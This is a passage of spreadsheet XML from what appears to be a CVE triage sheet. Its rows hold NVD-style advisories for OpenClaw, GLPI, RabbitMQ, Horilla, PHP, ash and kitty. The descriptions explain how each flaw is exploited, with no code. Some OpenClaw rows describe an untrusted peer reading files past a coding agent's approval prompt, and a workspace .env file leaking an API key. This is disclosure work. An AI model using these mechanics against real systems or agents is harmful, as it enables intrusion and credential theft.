      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 contains a server-side request forgery vulnerability in its trusted-host DNS checks. For fetches that use the trusted-host DNS recheck, a trusted hostname that resolves to an unspecified address (0.0.0.0 or ::) bypasses the SSRF destination validation. An attacker who can influence DNS for an allowed hostname can therefore cause a guarded fetch to reach a service bound only to loopback and disclose its response; the practical impact depends on the reachable service and the data it returns. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100574</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53628</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.84 until 10.0.26 and 11.0.8, an administrator holding the Update auth and sync or Update auth, sync and 2FA right can change the authentication method and disable two-factor authentication for user accounts outside the administrator's entity scope. The affected user-account administration flow did not consistently enforce the target user's entity-scoped update permission. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53628</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67222</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15, 4.0.20, 4.1.11, and 4.2.6, mechanisms/1 applied list_to_atom/1 to every colon-delimited token in an attacker-controlled auth_mechanism value, permanently consuming Erlang VM atoms and allowing the node to be crashed with a large request. Exploitation requires the Shovel or Federation plugin to be in use, and setting auth_mechanism requires the policymaker tag. This issue is fixed in versions 3.13.15, 4.0.20, 4.1.11, and 4.2.6.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67222</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67227</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.0.22 and 4.1.14 and 4.2.7 and 4.3.1, Atom exhaustion: toatom on global-parameter :name. resourceexists/2 (and the PUT/DELETE handlers) call rabbitdatacoercion:toatom/1 on the :name URL path segment. toatom/1 uses binarytoatom/2 (unsafe). The endpoint requires policymaker (not management, but below A user with the policymaker tag can crash the node by exhausting the atom table via repeated requests to /api/global-parameters/:name with unique :name Management plugin enabled policymaker tag ~1M HTTP. This issue is fixed in versions 4.0.22 and 4.1.14 and 4.2.7 and 4.3.1.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67227</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67415</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.9 and 4.3.3, the Shovel parameter parser converted attacker-controlled runtime parameter values into non-garbage-collected Erlang atoms before bounding them or checking a fixed allowlist. Exploitation requires network access to the Management HTTP API, valid credentials with both the management and policymaker tags, permission to set Shovel runtime parameters on a vhost, and the rabbitmq_shovel and rabbitmq_shovel_management plugins to be enabled. The attacker can exhaust the node-wide atom table and deny service, and malicious parameters are stored durably and reparsed when workers start, so atom pressure can recur after restart without a live attacker connection. This issue is fixed in versions 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67415</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86066</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr">
        <is>
          <t>django, go</t>
        </is>
      </c>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 2.0.0, approve_validate_attendance_request at /attendance/approve-validate-attendance-request/ changes attendance_validated, is_validate_request_approved, approved_by, and related pending-request state through an HTTP GET before calling attendance.save(), so Django does not require CSRF validation for the action. An unauthenticated attacker can cause a logged-in manager with attendance.change_attendance to make a top-level request that carries the manager's SameSite=Lax session cookie, silently approving attendance with the victim's privileges and attributing the approval to the victim in the audit trail. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86066</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91766</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr">
        <is>
          <t>github, gin</t>
        </is>
      </c>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>When the http:// stream wrapper follows a redirect it forwards the user-supplied Authorization, Cookie and Proxy-Authorization headers unchanged, even when the redirect target is a different host, a different port, or a downgrade from HTTPS to HTTP. A server that can steer a redirect therefore receives credentials that were only meant for the original origin. This is the same class of issue that libcurl fixed in 7.58.0 ( CVE-2018-1000007 https://github.com/advisories/GHSA-g7x2-hrfp-pv5f ).</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91766</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92842</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>The convert.base64-encode, convert.quoted-printable-encode and convert.quoted-printable-decode stream filters accept a line-break-chars option whose length is tracked separately from the string itself. The filter constructors duplicate the value with pestrdup(), which stops at the first NUL byte, while keeping the original length. When the filter later emits a line break it copies the recorded length out of the truncated allocation, reading past its end and placing adjacent heap bytes into the filter output.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92842</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93477</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in ash-project ash allows a user to set the value of a private action argument on the bulk destroy and bulk update paths.
Action arguments declared with public?: false are meant to be set only by trusted server-side code (for example via Ash.Changeset.set_private_argument/3) and must not be settable from end-user input. CVE-2026-55736 fixed the non-bulk changeset path to strip private arguments from user-supplied parameter maps, but the bulk destroy and bulk update paths were not covered.
Ash.Actions.Destroy.Bulk.base_changeset/5 and Ash.Actions.Update.Bulk.base_changeset/5 match every key in the caller-supplied parameter map against all of the action's arguments with no public? check, then apply the matches to the base changeset. A caller who can submit parameters to a bulk destroy or bulk update action (for example through AshJsonApi, AshGraphql, or a controller that forwards request parameters to Ash.bulk_destroy/4 or Ash.bulk_update/4) can therefore set any private argument of that action, including one referenced by an arg(...) template in the action's changes or validations. Depending on how the application uses the argument (for example an acting_user_id driving authorization or record ownership, or audit metadata), this can lead to an integrity violation or privilege escalation.
The fix requires public? in the argument matching on both bulk paths; private arguments remain settable server-side via the :private_arguments option.
This issue affects ash: from 2.17.15 before 3.33.11.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93477</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93682</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>When the HTTP stream wrapper follows a redirect and the response carries a Location header with an empty value, the redirect code reads one byte past the end of the heap buffer holding the location. The value of that out-of-bounds byte decides which redirect target is built, so a malicious server controls whether the client is sent to the host root or to the current directory.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93682</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95835</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in the askpass escape code handler in kitty from 0.25.0 before 0.49.0 allows a local user other than the one running the terminal to obtain the text typed into a prompt that kitty itself displays, because handle_remote_askpass() in kitty/window.py opens the POSIX shared memory object named in the escape code, parses a prompt definition out of it, and writes the user's answer back into an object of that same name, without at any point checking that the object is owned by the user running kitty or that its permissions exclude other users. The equivalent consumer of the same SharedMemory class in the ssh kitten performs exactly that check; the askpass path did not. The handler is reached through a device control string processed from the byte stream of the window, so the attacker must also cause bytes of their choosing to be displayed by the victim's terminal. Where the POSIX shared memory namespace is shared between the two users, a second local user can create an object with permissions that allow the victim to read and write it, cause the victim's kitty to render a prompt of the attacker's choosing, including a masked password prompt, and read the typed secret back out of the object afterwards. The prompt text is additionally passed to the display without control character sanitisation, so it can overwrite the warning line kitty prints above it. The answer is written by reopening an object of that name when the user answers, rather than through the handle already held. This results in disclosure of a secret typed by the victim to a second local user, and does not require any privilege on the victim's account.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95835</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100547</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is a coding agent distributed as the npm package `openclaw`. In affected versions (2026.7.1 through 2026.7.2), alternate but valid `file:` URL spellings supplied over the Agent Client Protocol (ACP) were treated as relative paths and were incorrectly classified as reads scoped to the session working directory. When an operator connected `openclaw acp client` to an untrusted or compromised ACP peer, that peer could request a read of a file outside the session working directory without the approval prompt normally required for that path, resulting in disclosure of local file contents. The demonstrated impact is limited to file confidentiality; mutating and command-capable tool classes are not affected. This issue is fixed in OpenClaw 2026.8.1.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100547</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100569</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed application. In versions &gt;= 2026.4.25 and &lt; 2026.8.1, the workspace environment-variable filter did not block variables ending in `_ENDPOINT`, so an untrusted workspace `.env` file could set AZURE_SPEECH_ENDPOINT. Azure Speech preferred that value over the configured region, so when a synthesis or voice-list request was made, the attacker-selected endpoint received the operator's Azure Speech key in the request header, allowing the key to be reused against the operator's Azure Speech resource. Exploitation requires an operator to start OpenClaw in attacker-controlled workspace content with Azure Speech configured with a key and region and no trusted endpoint override set. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100569</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100581</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>OpenClaw for iOS before 2026.8.11 stores Gateway credentials as cleartext JSON in App Group UserDefaults instead of the device Keychain. Attackers with access to unencrypted device backups or extracted App Group containers can recover valid Gateway tokens and passwords to authenticate with operator authority.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100581</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12037</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
